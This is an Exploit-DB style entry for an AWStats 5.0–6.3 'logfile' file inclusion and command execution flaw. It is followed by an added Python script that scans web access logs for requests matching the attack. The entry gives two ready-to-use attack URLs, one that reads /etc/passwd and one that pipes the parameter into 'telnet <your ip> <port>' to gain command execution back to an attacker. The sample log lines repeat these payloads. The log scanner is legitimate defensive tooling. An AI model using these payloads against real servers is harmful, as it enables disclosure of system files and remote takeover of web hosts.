AWStats 5.0 < 6.3 - 'logfile' File Inclusion / Command Execution

EDB-ID: 407

CVE:

Platform: CGI

Date: 2004-08-21



Example:

http://[target]/awstats.pl?filterrawlog=&rawlog_maxlines=5000&config=stats.jdims.info&framename=main&pluginmode=rawlog&logfile=/etc/passwd

http://[target]/awstats.pl?filterrawlog=&rawlog_maxlines=5000&config=stats.jdims.info&framename=main&pluginmode=rawlog&logfile=&logfile=|telnet <your ip> <port>


# milw0rm.com [2004-08-21]
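
Added example, not part of the original entry: a defender-side check that scans web server access logs for awstats.pl requests carrying a `logfile` parameter shaped like the two URLs above. The sample log lines are constructed, and the names `classify` and `scan` and the reason labels are illustrative assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines (combined log format); hosts and IPs are placeholders.
SAMPLE_LOG = [
    '198.51.100.7 - - [21/Aug/2004:10:00:01 +0000] "GET /cgi-bin/awstats.pl?config=stats.example.org&framename=main HTTP/1.0" 200 5120',
    '198.51.100.9 - - [21/Aug/2004:10:02:13 +0000] "GET /cgi-bin/awstats.pl?config=stats.example.org&pluginmode=rawlog&logfile=/etc/passwd HTTP/1.0" 200 1833',
    '198.51.100.9 - - [21/Aug/2004:10:02:40 +0000] "GET /cgi-bin/awstats.pl?config=stats.example.org&pluginmode=rawlog&logfile=&logfile=%7Ctelnet%20192.0.2.10%204444 HTTP/1.0" 200 0',
    '198.51.100.3 - - [21/Aug/2004:10:05:00 +0000] "GET /index.html?logfile=/etc/passwd HTTP/1.0" 200 900',
]

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def classify(target):
    """Return the reasons a request target matches the pattern, [] if none."""
    parts = urlsplit(target)
    if not parts.path.lower().endswith("awstats.pl"):
        return []
    query = parse_qs(parts.query, keep_blank_values=True)
    # parse_qs percent-decodes values and keeps every repeat of a parameter,
    # so an empty first logfile= followed by a second one is still inspected.
    values = [v.strip() for v in query.get("logfile", []) if v.strip()]
    reasons = []
    if any("|" in v for v in values):
        reasons.append("pipe-in-logfile")
    if any(v.startswith("/") or ".." in v for v in values):
        reasons.append("path-in-logfile")
    if values and not reasons:
        reasons.append("logfile-override")
    if reasons and "rawlog" in query.get("pluginmode", []):
        reasons.append("rawlog-plugin")
    return reasons

def scan(lines):
    """Return (line_number, reasons) for each log line that matches."""
    hits = []
    for number, line in enumerate(lines, start=1):
        match = REQUEST_RE.search(line)
        reasons = classify(match.group(1)) if match else []
        if reasons:
            hits.append((number, reasons))
    return hits

if __name__ == "__main__":
    for number, reasons in scan(SAMPLE_LOG):
        print(f"line {number}: {', '.join(reasons)}")
```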